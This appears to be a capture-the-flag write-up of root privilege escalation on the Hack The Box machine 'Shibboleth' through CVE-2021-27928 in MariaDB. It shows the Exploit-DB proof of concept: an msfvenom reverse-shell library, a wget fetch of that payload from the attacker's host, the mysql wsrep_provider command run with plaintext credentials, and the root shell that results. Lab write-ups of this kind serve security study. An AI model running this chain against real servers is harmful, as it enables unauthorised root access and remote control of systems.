InfoSec LAB

Shibboleth_Privilege_Escalation

Created: 3 min read

CVE-2021-27928

a vulnerability, which was classified as critical, has been found in mariadb up to 10.2.36/10.3.27/10.4.17/10.5.8 (Database Software). This issue affects an unknown function. The manipulation with an unknown input leads to a untrusted search path vulnerability. Using CWE to declare the problem leads to CWE-426. The application searches for critical resources using an externally-supplied search path that can point to resources that are not under the application’s direct control. Impacted is confidentiality, integrity, and availability.

Exploit

┌──(kali㉿kali)-[~/…/htb/labs/shibboleth/CVE-2021-27928]
└─$ searchsploit -m linux/local/49765.txt ; mv 49765.txt CVE-2021-27928.txt
  Exploit: MariaDB 10.2 - 'wsrep_provider' OS Command Execution
      URL: https://www.exploit-db.com/exploits/49765
     Path: /usr/share/exploitdb/exploits/linux/local/49765.txt
    Codes: CVE-2021-27928
 Verified: False
File Type: ASCII text
Copied to: /home/kali/archive/htb/labs/shibboleth/CVE-2021-27928/49765.txt
 
┌──(kali㉿kali)-[~/…/htb/labs/shibboleth/CVE-2021-27928]
└─$ cat CVE-2021-27928.txt                                    
# Exploit Title: MariaDB 10.2 /MySQL - 'wsrep_provider' OS Command Execution
# Date: 03/18/2021
# Exploit Author: Central InfoSec
# Version: MariaDB 10.2 before 10.2.37, 10.3 before 10.3.28, 10.4 before 10.4.18, and 10.5 before 10.5.9; Percona Server through 2021-03-03; and the wsrep patch through 2021-03-03 for MySQL
# Tested on: Linux
# CVE : CVE-2021-27928
 
# Proof of Concept:
 
# Create the reverse shell payload
msfvenom -p linux/x64/shell_reverse_tcp LHOST=<ip> LPORT=<port> -f elf-so -o CVE-2021-27928.so
 
# Start a listener
nc -lvp <port>
 
# Copy the payload to the target machine (In this example, SCP/SSH is used)
scp CVE-2021-27928.so <user>@<ip>:/tmp/CVE-2021-27928.so
 
# Execute the payload
mysql -u <user> -p -h <ip> -e 'SET GLOBAL wsrep_provider="/tmp/CVE-2021-27928.so";'

The step-by-step exploit is available at Exploit-DB

Exploitation

ipmi-svc@shibboleth:/dev/shm$ wget -q http://10.10.14.7/CVE-2021-27928/CVE-2021-27928.so

The payload has been delivery to the target system at the /dev/shm directory over HTTP

ipmi-svc@shibboleth:/dev/shm$ mysql -uzabbix -pbloooarskybluh -e 'SET GLOBAL wsrep_provider="/dev/shm/CVE-2021-27928.so";'

Executing the exploit command

┌──(kali㉿kali)-[~/…/htb/labs/shibboleth/CVE-2021-27928]
└─$ nnc 1234
listening on [any] 1234 ...
connect to [10.10.14.7] from (UNKNOWN) [10.10.11.124] 45528
whoami
root
hostname
shibboleth
ifconfig
eth0: flags=4163<UP,BROADCAST,RUNNING,MULTICAST>  mtu 1500
        inet 10.10.11.124  netmask 255.255.255.0  broadcast 10.10.11.255
        inet6 fe80::250:56ff:feb9:967b  prefixlen 64  scopeid 0x20<link>
        inet6 dead:beef::250:56ff:feb9:967b  prefixlen 64  scopeid 0x0<global>
        ether 00:50:56:b9:96:7b  txqueuelen 1000  (Ethernet)
        RX packets 19954  bytes 6507332 (6.5 MB)
        RX errors 0  dropped 46  overruns 0  frame 0
        TX packets 21093  bytes 6714736 (6.7 MB)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0
 
lo: flags=73<UP,LOOPBACK,RUNNING>  mtu 65536
        inet 127.0.0.1  netmask 255.0.0.0
        inet6 ::1  prefixlen 128  scopeid 0x10<host>
        loop  txqueuelen 1000  (Local Loopback)
        RX packets 190629  bytes 18092849 (18.0 MB)
        RX errors 0  dropped 0  overruns 0  frame 0
        TX packets 190629  bytes 18092849 (18.0 MB)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0

System Level Compromise

Interactive Graph View

Backlinks